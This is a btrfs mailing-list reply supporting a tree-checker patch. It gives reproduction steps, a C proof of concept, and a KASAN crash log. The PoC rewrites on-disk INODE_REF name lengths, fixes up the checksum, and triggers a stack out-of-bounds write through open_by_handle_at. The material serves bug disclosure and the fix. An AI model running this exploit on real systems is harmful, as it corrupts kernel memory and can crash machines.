Linux Btrfs filesystem development
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: linux-btrfs@vger.kernel.org
Cc: dsterba@suse.com, josef@toxicpanda.com, clm@fb.com, xmei5@asu.edu
Subject: Re: [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths
Date: Wed, 10 Jun 2026 18:45:06 +0800	[thread overview]
Message-ID: <aik0hEV6ehKx6Ldv@Air.local> (raw)
In-Reply-To: <20260608083509.3907960-2-bestswngs@gmail.com>

Reproduction:


required kernel configuration
```
CONFIG_BTRFS_FS=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
ONFIG_KASAN_STACK=y
CONFIG_STACKPROTECTOR_STRONG=y
```

Steps to reproduce:

1. Create a btrfs filesystem
```
#!/bin/sh
set -e
OUT="${1:-base.img}"; SIZE="${2:-512M}"
rm -f "$OUT"; truncate -s "$SIZE" "$OUT"
mkfs.btrfs -f "$OUT" >/dev/null
echo "wrote clean btrfs image: $OUT ($SIZE)"
```

2. Then Run qemu with the image
```
qemu-system-x86_64 -enable-kvm -cpu host -m 4G -smp 2 -nographic -no-reboot \
    -kernel kernel/test-bzImage-kasan \
    -initrd env/initramfs-selfcontained.cpio.gz \
    -drive file=/tmp/base.img,if=virtio,format=raw,snapshot=on \
    -append "console=ttyS0 rdinit=/init nokaslr kasan.fault=panic"
```


3. run the PoC

```c
// Build:  gcc -O2 -static -o poc poc_selfcontained.c
// Run  :  attach a freshly `mkfs.btrfs`-ed image as DEV (default /dev/vda)

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/mman.h>

#ifndef DEV
#define DEV "/dev/vda"
#endif
#define MNT "/mnt"

#define HDR             0x65    // sizeof(struct btrfs_header)
#define ITEM            25      // sizeof(struct btrfs_item)
#define IREF            10      // sizeof(struct btrfs_inode_ref): u64 index + u16 name_len
#define SECTOR          4096
#define KEY_INODE_REF   12      // BTRFS_INODE_REF_KEY
#define TARGET_NAME_LEN 4096

static uint32_t crc32c(const uint8_t *p, size_t n)
{
	uint32_t crc = ~0u;
	for (size_t i = 0; i < n; i++) {
		crc ^= p[i];
		for (int k = 0; k < 8; k++)
			crc = (crc >> 1) ^ (0x82F63B78u & (-(int32_t)(crc & 1)));
	}
	return ~crc;
}
static uint64_t rd64(const uint8_t *p){ uint64_t v; memcpy(&v,p,8); return v; }
static uint32_t rd32(const uint8_t *p){ uint32_t v; memcpy(&v,p,4); return v; }
static void     wr32(uint8_t *p, uint32_t v){ memcpy(p,&v,4); }
static void     wr16(uint8_t *p, uint16_t v){ memcpy(p,&v,2); }

struct fh { struct file_handle h; unsigned char buf[64]; };

// Rewrite d's INODE_REF item on the raw device (every DUP copy of the leaf).
static int patch_device(const char *dev, uint64_t d_ino, uint64_t sub_ino)
{
	int fd = open(dev, O_RDWR);
	if (fd < 0) { perror("open dev"); return -1; }
	off_t sz = lseek(fd, 0, SEEK_END);
	uint8_t *m = mmap(NULL, sz, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if (m == MAP_FAILED) { perror("mmap"); close(fd); return -1; }

	// superblock @ 64K: magic@+0x40, fsid@+0x20, nodesize@+0x94
	const uint8_t *sb = m + 0x10000;
	if (memcmp(sb + 0x40, "_BHRfS_M", 8)) { fprintf(stderr,"bad btrfs magic\n"); return -1; }
	uint8_t fsid[16]; memcpy(fsid, sb + 0x20, 16);
	uint32_t nodesize = rd32(sb + 0x94);

	int patched = 0;
	for (off_t off = 0; off + (off_t)nodesize <= sz; off += SECTOR) {
		if (memcmp(m + off + 0x20, fsid, 16)) continue;   // same filesystem
		if (m[off + 0x64] != 0) continue;                 // leaf (level 0)
		uint32_t nritems = rd32(m + off + 0x60);
		if (!nritems || nritems > 2000) continue;

		for (uint32_t i = 0; i < nritems; i++) {
			off_t ip = off + HDR + (off_t)i * ITEM;
			if (rd64(m+ip) != d_ino || m[ip+8] != KEY_INODE_REF ||
			    rd64(m+ip+9) != sub_ino)
				continue;
			uint32_t ioff = rd32(m+ip+17), isize = rd32(m+ip+21);
			if (isize != IREF + 1) continue;              // expect the "d" entry (len 1)

			uint32_t new_size = IREF + TARGET_NAME_LEN;   // 4106
			uint32_t delta    = new_size - isize;         // 4095

			// start of the packed data region = lowest item data offset
			uint32_t data_end = nodesize;
			for (uint32_t j = 0; j < nritems; j++) {
				uint32_t o = rd32(m+off+HDR+(off_t)j*ITEM+17);
				if (o < data_end) data_end = o;
			}
			if (delta > data_end - ITEM*nritems) { fprintf(stderr,"no room\n"); continue; }

			// grow item i: shift the data of items at offset <= ioff down by delta
			uint8_t *base = m + off + HDR;
			memmove(base + data_end - delta, base + data_end,
				(ioff + isize) - data_end);
			for (uint32_t j = 0; j < nritems; j++) {
				off_t jp = off + HDR + (off_t)j * ITEM;
				uint32_t o = rd32(m+jp+17);
				if (o <= ioff) wr32(m+jp+17, o - delta);
			}
			wr32(m + ip + 21, new_size);                  // item size 11 -> 4106
			wr16(base + (ioff - delta) + 8, TARGET_NAME_LEN); // name_len 1 -> 4096

			wr32(m + off, crc32c(m + off + 0x20, nodesize - 0x20)); // leaf csum
			patched++;
			break;            // one matching item per leaf; keep scanning for DUP copies
		}
	}
	msync(m, sz, MS_SYNC);
	munmap(m, sz);
	close(fd);
	return patched;
}

int main(void)
{
	struct fh fh; int mid; struct stat st;
	uint64_t d_ino, sub_ino;

	mkdir(MNT, 0755);
	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #1"); return 1; }

	mkdir(MNT "/sub", 0755);
	if (mkdir(MNT "/sub/d", 0755)) { perror("mkdir /sub/d"); return 1; }
	stat(MNT "/sub",   &st); sub_ino = st.st_ino;
	stat(MNT "/sub/d", &st); d_ino   = st.st_ino;
	printf("[poc] created /sub/d  (sub_ino=%lu d_ino=%lu)\n",
	       (unsigned long)sub_ino, (unsigned long)d_ino);

	fh.h.handle_bytes = sizeof fh.buf;
	if (name_to_handle_at(AT_FDCWD, MNT "/sub/d", &fh.h, &mid, 0)) {
		perror("name_to_handle_at"); return 1;
	}
	printf("[poc] obtained file handle for /sub/d (%u bytes)\n", fh.h.handle_bytes);
	sync();
	umount(MNT);

	int n = patch_device(DEV, d_ino, sub_ino);
	printf("[poc] rewrote %d on-disk INODE_REF copy/ies: name_len 1 -> %d, "
	       "item 11 -> %d bytes\n", n, TARGET_NAME_LEN, IREF + TARGET_NAME_LEN);
	if (n < 1) { fprintf(stderr, "[poc] nothing patched\n"); return 1; }

	if (mount(DEV, MNT, "btrfs", 0, NULL)) { perror("mount #2"); return 1; }
	int mfd = open(MNT, O_RDONLY | O_DIRECTORY);
	if (mfd < 0) { perror("open mnt"); return 1; }

	puts("[poc] open_by_handle_at(/sub/d) -> reconnect_path -> btrfs_get_name "
	     "(expect stack-OOB on a vulnerable kernel)");
	int r = open_by_handle_at(mfd, &fh.h, O_RDONLY | O_DIRECTORY);
	if (r < 0)
		printf("[poc] open_by_handle_at: %s  -- no crash, kernel is PATCHED\n",
		       strerror(errno));
	else
		puts("[poc] open_by_handle_at succeeded (unexpected)");
	return 0;
}

```


4. Observe the crash

```
[   23.447577][  T178] BUG: KASAN: stack-out-of-bounds in read_extent_buffer+0x2b4/0x3c0
k-OOB on a vulne[   23.447983][  T178] Write of size 633 at addr ffff88810a67fbc0 by task poc/178
rable kernel)
[   23.448358][  T178]
[   23.448523][  T178] CPU: 1 UID: 0 PID: 178 Comm: poc Tainted: G        W           7.1.0-rc2+ #166 PREEMPT(lazy)  94e7405e6ff72f9547adbe151fef187ff71238a
[   23.448527][  T178] Tainted: [W]=WARN
[   23.448527][  T178] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   23.448529][  T178] Call Trace:
[   23.448530][  T178]  <TASK>
[   23.448531][  T178]  dump_stack_lvl+0x93/0x100
[   23.448535][  T178]  print_address_description.constprop.0+0x30/0x400
[   23.448537][  T178]  ? __virt_addr_valid+0x228/0x440
[   23.448540][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448542][  T178]  print_report+0xc4/0x2c0
[   23.448544][  T178]  ? __virt_addr_valid+0x237/0x440
[   23.448546][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448548][  T178]  kasan_report+0xf8/0x140
[   23.448550][  T178]  ? read_extent_buffer+0x2b4/0x3c0
[   23.448553][  T178]  kasan_check_range+0x119/0x200
[   23.448555][  T178]  __asan_memcpy+0x3c/0x80
[   23.448558][  T178]  read_extent_buffer+0x2b4/0x3c0
[   23.448561][  T178]  btrfs_get_name+0x333/0x600
[   23.448564][  T178]  ? __pfx_btrfs_get_name+0x40/0x40
[   23.448566][  T178]  ? __lock_acquire+0x4f9/0xc00
[   23.448570][  T178]  reconnect_one+0x17e/0x580
[   23.448572][  T178]  ? __pfx_reconnect_one+0x40/0x40
[   23.448574][  T178]  ? trace_preempt_enable+0xac/0x180
[   23.448576][  T178]  ? _raw_spin_unlock+0x2d/0x80
[   23.448578][  T178]  ? trace_preempt_on+0x2c/0x40
[   23.448581][  T178]  reconnect_path+0x20c/0x2c0
[   23.448583][  T178]  ? __pfx_vfs_dentry_acceptable+0x40/0x40
[   23.448586][  T178]  exportfs_decode_fh_raw+0x5a3/0x880
[   23.448588][  T178]  ? __pfx_exportfs_decode_fh_raw+0x40/0x40
[   23.448594][  T178]  ? __might_fault+0xad/0x140
[   23.448596][  T178]  ? __lock_release.isra.0+0x5d/0x180
[   23.448598][  T178]  ? __might_fault+0xad/0x140
[   23.448601][  T178]  handle_to_path+0x524/0x880
[   23.448603][  T178]  ? __pfx_handle_to_path+0x40/0x40
[   23.448606][  T178]  ? entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   23.448608][  T178]  ? lockdep_hardirqs_on+0x7f/0x140
[   23.448611][  T178]  ? do_handle_open+0x7e/0x200
[   23.448613][  T178]  do_handle_open+0x7e/0x200
[   23.448615][  T178]  ? __pfx_do_handle_open+0x40/0x40
[   23.448617][  T178]  ? rcu_is_watching+0x15/0xc0
[   23.448619][  T178]  ? do_syscall_64+0x129/0xf00
[   23.448621][  T178]  ? trace_preempt_enable+0xac/0x180
[   23.448623][  T178]  do_syscall_64+0x17a/0xf00
[   23.448625][  T178]  ? do_syscall_64+0x129/0xf00
[   23.448626][  T178]  ? clear_bhb_loop+0x60/0xc0
[   23.448628][  T178]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   23.448630][  T178] RIP: 0033:0x41bf74
[   23.448632][  T178] Code: 89 02 48 c7 c0 ff ff ff ff eb b4 e8 e6 08 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 80 3d ed 80 09 00 00 74 13 b8 30 01 00 00 0f 05 5
[   23.448634][  T178] RSP: 002b:00007fffce51fac8 EFLAGS: 00000202 ORIG_RAX: 0000000000000130
[   23.448636][  T178] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000000000041bf74
[   23.448638][  T178] RDX: 0000000000010000 RSI: 00007fffce51fb30 RDI: 0000000000000003
[   23.448639][  T178] RBP: 0000000000000003 R08: 0000000000000000 R09: 0000000000000000
[   23.448640][  T178] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000102
[   23.448641][  T178] R13: 0000000000000003 R14: 00007fffce51fb30 R15: 00007fffce51fc10
[   23.448644][  T178]  </TASK>
[   23.448645][  T178]
[   23.462123][  T178] The buggy address belongs to stack of task poc/178
[   23.462403][  T178]  and is located at offset 64 in frame:
[   23.462639][  T178]  exportfs_decode_fh_raw+0x0/0x880
[   23.462860][  T178]
[   23.462961][  T178] This frame has 2 objects:
[   23.463159][  T178]  [32, 48) 'path'
[   23.463161][  T178]  [64, 320) 'nbuf'
[   23.463320][  T178]
[   23.463582][  T178] The buggy address belongs to the physical page:
[   23.463852][  T178] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a67f
[   23.464228][  T178] flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff)
[   23.464540][  T178] raw: 0017ffffc0000000 ffffea0004299fc8 ffffea0004299fc8 0000000000000000
[   23.464899][  T178] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
[   23.465263][  T178] page dumped because: kasan: bad access detected
[   23.465532][  T178]
[   23.465633][  T178] Memory state around the buggy address:
[   23.465869][  T178]  ffff88810a67fb80: f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 00 00 00 00
[   23.466212][  T178]  ffff88810a67fc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   23.466549][  T178] >ffff88810a67fc80: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3
[   23.466886][  T178]                                            ^
[   23.467152][  T178]  ffff88810a67fd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   23.467489][  T178]  ffff88810a67fd80: f1 f1 f1 f1 00 00 00 f2 f2 f2 f2 f2 00 f3 f3 f3
[   23.467826][  T178] ==================================================================
[   23.468184][  T178] Kernel panic - not syncing: kasan.fault=panic set ...
```

  parent reply	other threads:[~2026-06-10 10:45 UTC|newest]

Thread overview: 4+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-08  8:35 [PATCH v2] btrfs: tree-checker: validate inode_ref and root_ref name lengths Weiming Shi
2026-06-08  9:19 ` Qu Wenruo
2026-06-10 10:45 ` Weiming Shi [this message]
2026-06-10 11:26   ` Qu Wenruo

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=aik0hEV6ehKx6Ldv@Air.local \
    --to=bestswngs@gmail.com \
    --cc=clm@fb.com \
    --cc=dsterba@suse.com \
    --cc=josef@toxicpanda.com \
    --cc=linux-btrfs@vger.kernel.org \
    --cc=xmei5@asu.edu \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox